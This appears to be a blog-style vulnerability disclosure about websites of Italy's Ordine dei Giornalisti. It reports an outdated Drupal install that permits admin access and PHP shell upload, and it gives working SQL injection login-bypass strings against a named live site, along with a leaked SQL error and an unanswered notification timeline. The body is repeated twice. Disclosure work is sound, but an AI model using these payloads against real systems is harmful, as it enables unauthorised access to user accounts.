Ordine dei Giornalisti - http://www.odg.it https://sigef-odg.lansystems.it - Sql injection, xss, system compromise
http://www.odg.it
Old version of Drupal with several security problems.
It's possible to have admin access and upload a php shell.
(2019-05 the problem is still there)
https://sigef-odg.lansystems.it
Access as any user via sql injection.
sample injection
user: ' or ''='
password: ' or ''='
(2019-05 - they tried to fix the problem the previous injection doesn't work)
New injection
' or ''=''--
sample screenshot
Sample error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and `password`=SHA2('',256) AND IFNULL(UFPC.eliminato,0) NOT IN (1,8,9)' at line 1
NOTE: I have not saved/stored any kind of confidential information and I have no criminal intents of any kind.
1958
---
2018-04 - odg.it has been notified (2 times) of the problems via email . No reply received.
2018-06 - no reply received. The problems are still there.
2019-05-12 - no reply but they tried to fix the problem on sigef.
Old version of Drupal with several security problems.
It's possible to have admin access and upload a php shell.
(2019-05 the problem is still there)
https://sigef-odg.lansystems.it
Access as any user via sql injection.
sample injection
user: ' or ''='
password: ' or ''='
(2019-05 - they tried to fix the problem the previous injection doesn't work)
New injection
' or ''=''--
sample screenshot
Sample error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and `password`=SHA2('',256) AND IFNULL(UFPC.eliminato,0) NOT IN (1,8,9)' at line 1
NOTE: I have not saved/stored any kind of confidential information and I have no criminal intents of any kind.
1958
---
2018-04 - odg.it has been notified (2 times) of the problems via email . No reply received.
2018-06 - no reply received. The problems are still there.
2019-05-12 - no reply but they tried to fix the problem on sigef.
Comments
Post a Comment